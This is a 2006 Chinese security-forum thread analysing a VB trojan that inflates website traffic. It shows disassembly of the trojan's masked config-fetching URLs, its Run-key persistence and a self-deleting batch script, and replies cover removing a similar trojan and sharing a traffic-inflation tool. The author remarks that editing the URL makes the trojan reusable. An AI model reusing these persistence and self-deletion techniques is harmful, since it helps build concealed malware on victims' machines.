[原创]对一刷网站访问量的小马分析
文章标题:[原创]对一刷网站访问量的小马分析顶部 混世魔王 发布于:2006-08-1610:18 [楼主][原创]对一刷网站访问量的小马分析
文章作者:混世魔王
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
系统补丁打完,网上瞎灌,居然还中网马,哎.现在....把他网马down下来,8错,真牛.通杀98.nt.2000.xp.xpsp2.2003.自己留着,随便来分析了下他的木马。一刷流量木马。服了。现在小马都出到这个份上了。
脱壳略,VB编写。
00403DAD .FF1554104000CALLDWORDPTRDS:[<&msvbvm60.__vbaHresu>;msvbvm60.__vbaHresultCheckObj
00403DB3 .8985E0FCFFFFMOVDWORDPTRSS:[EBP-320],EAX
00403DB9 .EB0A JMPSHORTRundll32.00403DC5
00403DBB >C785E0FCFFFF>MOVDWORDPTRSS:[EBP-320],0
00403DC5 >8B9560FEFFFFMOVEDX,DWORDPTRSS:[EBP-1A0]
00403DCB .8995F8FCFFFFMOVDWORDPTRSS:[EBP-308],EDX
00403DD1 .C78560FEFFFF>MOVDWORDPTRSS:[EBP-1A0],0
00403DDB .8B85F8FCFFFFMOVEAX,DWORDPTRSS:[EBP-308]
00403DE1 .898534FEFFFFMOVDWORDPTRSS:[EBP-1CC],EAX
00403DE7 .C7852CFEFFFF>MOVDWORDPTRSS:[EBP-1D4],8
00403DF1 .8D952CFEFFFFLEAEDX,DWORDPTRSS:[EBP-1D4]
00403DF7 .8D8DF8FEFFFFLEAECX,DWORDPTRSS:[EBP-108]
00403DFD .FF1508104000CALLDWORDPTRDS:[<&msvbvm60.__vbaVarMo>;msvbvm60.__vbaVarMove
00403E03 .C745FC06000>MOVDWORDPTRSS:[EBP-4],6
00403E0A .C785D4FDFFFF>MOVDWORDPTRSS:[EBP-22C],Rundll32.0040>;UNICODE"http://www.xxxxxxxx.com/tc/adset.txt"
00403E14 .C785CCFDFFFF>MOVDWORDPTRSS:[EBP-234],8
00403E1E .8D95CCFDFFFFLEAEDX,DWORDPTRSS:[EBP-234]
00403E24 .8D4DA0 LEAECX,DWORDPTRSS:[EBP-60]
00403E27 .FF1570114000CALLDWORDPTRDS:[<&msvbvm60.__vbaVarCo>;msvbvm60.__vbaVarCopy
00403E2D .C745FC07000>MOVDWORDPTRSS:[EBP-4],7
00403E34 .C785D4FDFFFF>MOVDWORDPTRSS:[EBP-22C],Rundll32.0040>;UNICODE"http://www.xxxxxxxx.com/tc/adlist.txt"
00403E3E .C785CCFDFFFF>MOVDWORDPTRSS:[EBP-234],8
00403E48 .8D95CCFDFFFFLEAEDX,DWORDPTRSS:[EBP-234]
00403E4E .8D8D6CFFFFFFLEAECX,DWORDPTRSS:[EBP-94]
00403E54 .FF1570114000CALLDWORDPTRDS:[<&msvbvm60.__vbaVarCo>;msvbvm60.__vbaVarCopy
00403E5A .C745FC08000>MOVDWORDPTRSS:[EBP-4],8
00403E61 .C785D4FDFFFF>MOVDWORDPTRSS:[EBP-22C],Rundll32.0040>;UNICODE"http://www.xxxxxxxx.com/tc/MMResult.asp"
00403E6B .C785CCFDFFFF>MOVDWORDPTRSS:[EBP-234],8
00403E75 .8D95CCFDFFFFLEAEDX,DWORDPTRSS:[EBP-234]
00403E7B .8D4D8C LEAECX,DWORDPTRSS:[EBP-74]
00403E7E .FF1570114000CALLDWORDPTRDS:[<&msvbvm60.__vbaVarCo>;msvbvm60.__vbaVarCopy
00403E84 .C745FC09000>MOVDWORDPTRSS:[EBP-4],9
00403E8B .C785D4FDFFFF>MOVDWORDPTRSS:[EBP-22C],Rundll32.0040>;UNICODE"http://www.xxxxxxxx.com/tc/adiepage.txt"
00403E95 .C785CCFDFFFF>MOVDWORDPTRSS:[EBP-234],8
00403E9F .8D95CCFDFFFFLEAEDX,DWORDPTRSS:[EBP-234]
00403EA5 .8D8DB8FEFFFFLEAECX,DWORDPTRSS:[EBP-148]
00403EAB .FF1570114000CALLDWORDPTRDS:[<&msvbvm60.__vbaVarCo>;msvbvm60.__vbaVarCopy
00403EB1 .C745FC0A000>MOVDWORDPTRSS:[EBP-4],0A
00403EB8 .C785D4FDFFFF>MOVDWORDPTRSS:[EBP-22C],Rundll32
.0040>;UNICODE"http://www.xxxxxxxx.com/tc/ieFavorites.txt"
00403EC2 .C785CCFDFFFF>MOVDWORDPTRSS:[EBP-234],8
00403ECC .8D95CCFDFFFFLEAEDX,DWORDPTRSS:[EBP-234]
00403ED2 .8D8D7CFFFFFFLEAECX,DWORDPTRSS:[EBP-84]
00403ED8 .FF1570114000CALLDWORDPTRDS:[<&msvbvm60.__vbaVarCo>;msvbvm60.__vbaVarCopy
00403EDE .C745FC0B000>MOVDWORDPTRSS:[EBP-4],0B
00403EE5 .C785D4FDFFFF>MOVDWORDPTRSS:[EBP-22C],Rundll32.0040>;UNICODE"WinDir"
00403EEF .C785CCFDFFFF>MOVDWORDPTRSS:[EBP-234],8
00403EF9 .8D95CCFDFFFFLEAEDX,DWORDPTRSS:[EBP-234]
00403EFF .8D8D2CFEFFFFLEAECX,DWORDPTRSS:[EBP-1D4]
00403F05 .FF156C114000CALLDWORDPTRDS:[<&msvbvm60.__vbaVarDu>;msvbvm60.__vbaVarDup
00403F0B .8D8D2CFEFFFFLEAECX,DWORDPTRSS:[EBP-1D4]
00403F11 .51 PUSHECX
00403F12 .8D951CFEFFFFLEAEDX,DWORDPTRSS:[EBP-1E4]
00403F18 .52 PUSHEDX
00403F19 .FF1560104000CALLDWORDPTRDS:[<&msvbvm60.rtcEnviron>;msvbvm60.rtcEnvironVar
00403F1F .C785C4FDFFFF>MOVDWORDPTRSS:[EBP-23C],Rundll32.0040>;UNICODE"\rundll32.exe"
00403F29 .C785BCFDFFFF>MOVDWORDPTRSS:[EBP-244],8
程序会到http://www.xxxxxxxx.com的tc文件读取配置文件,同时访问tc/MMResult.asp
生成文件
00404DA2 ./EB0A JMPSHORTRundll32.00404DAE //获取文件路径堆栈
00404DA4 >|C78588FCFFFF>MOVDWORDPTRSS:[EBP-378],0
00404DAE >\8B8560FEFFFFMOVEAX,DWORDPTRSS:[EBP-1A0] //我程序路径是"D:\fuckyou"
00404DB4 .50 PUSHEAX //路径入eax
00404DB5 .6880274000 PUSHRundll32.00402780 ;//生成killme.bat
00404DBA .FF1548104000CALLDWORDPTRDS:[<&msvbvm60.__vbaStrCat>;msvbvm60.__vbaStrCat
00404DC0 .8BD0 MOVEDX,EAX //文件路径+文件名字D:\fuckyou\killme.bat
00404DC2 .8D8D5CFEFFFFLEAECX,DWORDPTRSS:[EBP-1A4]
00404DC8 .FF1580114000CALLDWORDPTRDS:[<&msvbvm60.__vbaStrMov>;msvbvm60.__vbaStrMove
00404DCE .50 PUSHEAX
00404DCF .6A01 PUSH1
00404DD1 .6AFF PUSH-1
00404DD3 .6A02 PUSH2
00404DD5 .FF1528114000CALLDWORDPTRDS:[<&msvbvm60.__vbaFileOp>;msvbvm60.__vbaFileOpen
00404DDB .8D8D5CFEFFFFLEAECX,DWORDPTRSS:[EBP-1A4]
00404DE1 .51 PUSHECX
00404DE2 .8D9560FEFFFFLEAEDX,DWORDPTRSS:[EBP-1A0]
00404DE8 .52 PUSHEDX
00404DE9 .6A02 PUSH2
00404DEB .FF1548114000CALLDWORDPTRDS:[<&msvbvm60.__vbaFreeSt>;msvbvm60.__vbaFreeStrList
00404DF1 .83C40C ADDESP,0C
00404DF4 .8D8D40FEFFFFLEAECX,DWORDPTRSS:[EBP-1C0]
00404DFA .FF15A8114000CALLDWORDPTRDS:[<&msvbvm60.__vbaFreeOb>;msvbvm60.__vbaFreeObj
00404E00 .C745FC23000>MOVDWORDPTRSS:[EBP-4],23
00404E07 .689C274000 PUSHRundll32.0040279C ;@echooff
00404E0C .6A01 PUSH1
00404E0E .68B4274000 PUSHRundll32.004027B4
00404E13 .FF15F8104000CALLDWORDPTRDS:[<&msvbvm60.__vbaPrintF>;msvbvm60.__vbaPrintFile
00404E19 .83C40C ADDESP,0C
00404E1C .C745FC24000>MOVDWORDPTRSS:[EBP-4],24
00404E23 .68BC274000 PUSHRundll32.004027BC ;sleep100
00404E28 .6A01 PUSH1
00404E2A .68B4274000 PUSHRundll32.004027B4
00404E2F .FF15F8104000CALLDWORDPTRDS:[<&msvbvm60.__vbaPrintF>;msvbvm60.__vbaPrintFile
00404E35 .83C40C ADDESP,0C
00404E38 .C745FC
25000>MOVDWORDPTRSS:[EBP-4],25
00404E3F .833DA8934000>CMPDWORDPTRDS:[4093A8],0
00404E46 .751C JNZSHORTRundll32.00404E64
00404E48 .68A8934000 PUSHRundll32.004093A8
00404E4D .6894254000 PUSHRundll32.00402594
00404E52 .FF1530114000CALLDWORDPTRDS:[<&msvbvm60.__vbaNew2>];msvbvm60.__vbaNew2
00404E58 .C78584FCFFFF>MOVDWORDPTRSS:[EBP-37C],Rundll32.00409>
00404E62 .EB0A JMPSHORTRundll32.00404E6E
00404E64 >C78584FCFFFF>MOVDWORDPTRSS:[EBP-37C],Rundll32.00409>
00404E6E >8B8584FCFFFFMOVEAX,DWORDPTRSS:[EBP-37C]
00404E74 .8B08 MOVECX,DWORDPTRDS:[EAX]
........
00404F1D .52 PUSHEDX
00404F1E .FF1554104000CALLDWORDPTRDS:[<&msvbvm60.__vbaHresul>;msvbvm60.__vbaHresultCheckObj
00404F24 .89857CFCFFFFMOVDWORDPTRSS:[EBP-384],EAX
00404F2A .EB0A JMPSHORTRundll32.00404F36
00404F2C >C7857CFCFFFF>MOVDWORDPTRSS:[EBP-384],0
00404F36 >68D4274000 PUSHRundll32.004027D4 ;del
00404F3B .8B8560FEFFFFMOVEAX,DWORDPTRSS:[EBP-1A0] //程序的文件名字
00404F41 .50 PUSHEAX //文件名入栈(rundll322)
00404F42 .68E4274000 PUSHRundll32.004027E4 ;.exe (rundll322.exe)
00404F47 .FF1548104000CALLDWORDPTRDS:[<&msvbvm60.__vbaStrCat>;msvbvm60.__vbaStrCat
00404F4D .8BD0 MOVEDX,EAX
00404F4F .8D8D5CFEFFFFLEAECX,DWORDPTRSS:[EBP-1A4]
00404F55 .FF1580114000CALLDWORDPTRDS:[<&msvbvm60.__vbaStrMov>;msvbvm60.__vbaStrMove
00404F5B .50 PUSHEAX
00404F5C .FF1548104000CALLDWORDPTRDS:[<&msvbvm60.__vbaStrCat>;msvbvm60.__vbaStrCat
00404F62 .8BD0 MOVEDX,EAX //(delrundll322.exe)
00404F64 .8D8D58FEFFFFLEAECX,DWORDPTRSS:[EBP-1A8]
00404F6A .FF1580114000CALLDWORDPTRDS:[<&msvbvm60.__vbaStrMov>;msvbvm60.__vbaStrMove
00404F70 .50 PUSHEAX
00404F71 .6A01 PUSH1
00404F73 .68B4274000 PUSHRundll32.004027B4
00404F78 .FF15F8104000CALLDWORDPTRDS:[<&msvbvm60.__vbaPrintF>;msvbvm60.__vbaPrintFile
00404F7E .83C40C ADDESP,0C
00404F81 .8D8D58FEFFFFLEAECX,DWORDPTRSS:[EBP-1A8]
00404F87 .51 PUSHECX
00404F88 .8D955CFEFFFFLEAEDX,DWORDPTRSS:[EBP-1A4]
00404F8E .52 PUSHEDX
00404F8F .8D8560FEFFFFLEAEAX,DWORDPTRSS:[EBP-1A0]
00404F95 .50 PUSHEAX
00404F96 .6A03 PUSH3
00404F98 .FF1548114000CALLDWORDPTRDS:[<&msvbvm60.__vbaFreeSt>;msvbvm60.__vbaFreeStrList
00404F9E .83C410 ADDESP,10
00404FA1 .8D8D40FEFFFFLEAECX,DWORDPTRSS:[EBP-1C0]
00404FA7 .FF15A8114000CALLDWORDPTRDS:[<&msvbvm60.__vbaFreeOb>;msvbvm60.__vbaFreeObj
00404FAD .C745FC26000>MOVDWORDPTRSS:[EBP-4],26
00404FB4 .68F4274000 PUSHRundll32.004027F4 ;delkillme.bat
00404FB9 .6A01 PUSH1
00404FBB .68B4274000 PUSHRundll32.004027B4
00404FC0 .FF15F8104000CALLDWORDPTRDS:[<&msvbvm60.__vbaPrintF>;msvbvm60.__vbaPrintFile
00404FC6 .83C40C ADDESP,0C
00404FC9 .C745FC27000>MOVDWORDPTRSS:[EBP-4],27
00404FD0 .6818284000 PUSHRundll32.00402818 ;cls
00404FD5 .6A01 PUSH1
00404FD7 .68B4274000 PUSHRundll32.004027B4
00404FDC .FF15F8104000CALLDWORDPTRDS:[<&msvbvm60.__vbaPrintF>;msvbvm60.__vbaPrintFile
00404FE2 .83C40C ADDESP,0C
00404FE5 .C745FC28000>M
OVDWORDPTRSS:[EBP-4],28
00404FEC .6824284000 PUSHRundll32.00402824 ;exit
00404FF1 .6A01 PUSH1
00404FF3 .68B4274000 PUSHRundll32.004027B4
00404FF8 .FF15F8104000CALLDWORDPTRDS:[<&msvbvm60.__vbaPrintF>;msvbvm60.__vbaPrintFile
00404FFE .83C40C ADDESP,0C
00405001 .C745FC29000>MOVDWORDPTRSS:[EBP-4],29
00405008 .6A01 PUSH1
0040500A .FF15A4104000CALLDWORDPTRDS:[<&msvbvm60.__vbaFileCl>;msvbvm60.__vbaFileClose
00405010 .C745FC2A000>MOVDWORDPTRSS:[EBP-4],2A
00405017 .833DA8934000>CMPDWORDPTRDS:[4093A8],0
0040501E .751C JNZSHORTRundll32.0040503C
00405020 .68A8934000 PUSHRundll32.004093A8
00405025 .6894254000 PUSHRundll32.00402594
生成批处删记录
killme.bat
echooff
sleep100
delrundll322.exe
delkillme.bat
cls
exit
简单的写注册表run。
004046ED .BA5C284000 MOVEDX,Rundll32.0040285C ;software\microsoft\windows\currentversion\run
004046F2 .8D8D08FFFFFFLEAECX,DWORDPTRSS:[EBP-F8]
004046F8 .FF1540114000CALLDWORDPTRDS:[<&msvbvm60.__vbaStrCop>;msvbvm60.__vbaStrCopy
004046FE .C745FC17000>MOVDWORDPTRSS:[EBP-4],17
00404705 .C785D4FDFFFF>MOVDWORDPTRSS:[EBP-22C],Rundll32.00402>;windir
0040470F .C785CCFDFFFF>MOVDWORDPTRSS:[EBP-234],8
00404719 .8D95CCFDFFFFLEAEDX,DWORDPTRSS:[EBP-234]
0040471F .8D8D2CFEFFFFLEAECX,DWORDPTRSS:[EBP-1D4]
00404725 .FF156C114000CALLDWORDPTRDS:[<&msvbvm60.__vbaVarDup>;msvbvm60.__vbaVarDup
0040472B .8D952CFEFFFFLEAEDX,DWORDPTRSS:[EBP-1D4]
00404731 .52 PUSHEDX
00404732 .8D851CFEFFFFLEAEAX,DWORDPTRSS:[EBP-1E4]
00404738 .50 PUSHEAX
00404739 .FF1560104000CALLDWORDPTRDS:[<&msvbvm60.rtcEnvironV>;msvbvm60.rtcEnvironVar
0040473F .C785C4FDFFFF>MOVDWORDPTRSS:[EBP-23C],Rundll32.00402>;\rundll32.exe
直接给出分析的总结吧。版权BY。混世魔王QQ:26836659
程序只是为了刷访问量。没有什么后门。也就隐藏了URL。用XXXX代理了。
程序运行后,你的电脑会访问http://www.xxxxxxxx.com/tc/MMResult.asp
看代码
.
‘地址用xxx代替了
’站长站的流量统计
把自身复制到c:/windows/
会生成批处删本地目录运行程序。
killme.bat
echooff
sleep100
delrundll322.exe
delkillme.bat
cls
exit
程序的运行方式是写注册表
software\microsoft\windows\currentversion\run
键值rundll32.exe
程序写的不好,要插入进程,那效果会点。
只要把他程序的URL修改一下这个木马就可以自己使用了.
有不足,还希指出。
程序编写很简单,但是技术丢了好久了,不去恶补写不出,也没有时间去恶补。
有编程不错的,写了记得传我一个。呵呵。msn:hsmw26836659@hotmail.com顶部 kiki 发布于:2006-08-1614:26 [1楼]
恩,这个程序是修改run键来启动的。
最近我也中
了一个小木马,好象也是刷流量的。
有意思的是,这个程序的名字竟然就叫做adf.com.cn,在进程表里就他那一个奇怪的进程名字,不同的是他是以服务形式启动的,服务名也是atf.com.cn,导致在开机的时候盧iG榭鱿乱芏唷
简单分析了下,程序运行期间就只往一个站点不停地发同样的http请求:
GET/ip.txtHTTP/1.0
User-Agent:MYURL
Host:ningzi8887.27h.com
Pragma:no-cache
。。。
在服务管理里先停止服务或者netstopadf.com.cn
接着scdeleteadf.com.cn
然后在注册表里再搜一遍,把所有与之相关的全部删除
接下来进入%windir%,在工具选项里选择显示所有文件和系统文件,文件是系统隐藏属性的,可以看到adf.com.cn,直接删除重新启动。
这下,系统启动就快多拉:)
看这程序的架势,好象就是玩弄咱们似的,搞一牛奇怪的进程名,真是不怕别人发现不了他!顶部 haicao 发布于:2006-08-1708:25 [2楼]
不知道楼上两个的软件作者是什么意图,如果刷流量指的是刷alexa排名的话,
以上两种方法是根本行不通的.
alexa的统计其实极其不准确,他只是统计了安装alexatools的ie用户,
记住只限能统计到安装了windows并且使用ie上网的用户,
但对普通老百姓来讲谁会去安装这个工具条呢?
即使网站一天没一个人访问,只要有一个安装了工具条的访问了,流量就被当有100了,
你说准不准呢,我们网站实际的ip访问量大概在3000左右,现在统计为Riip量5500
而前一段实际ip量为1500左右,却都是统计为9000,倒.........
以前我根据boss的意见也写了一个尝试用来刷流量,以下共享出源码给需要的朋友去学习一下.
附件:AlexaWeb.rar(270K)下载次数:253顶部 光芒果 发布于:2006-08-1714:56 [3楼]
我觉得应该是刷广告的,我GF也遇到过类似的,感觉应该算是流氓软件,不算木马。顶部 ybjh 发布于:2007-01-1109:14 [4楼]
RUN项可以设置只读权限禁止访问,一般没必要留着写权限(c)Copyleft2003-2007,EvilOctalSecurityTeam.
ThisfileisdecompiledbyanunregisteredversionofChmDecompiler.
Regsiteredversiondoesnotshowthismessage.
YoucandownloadChmDecompilerat:http://www.zipghost.com/
对一刷网站访问量的小马分析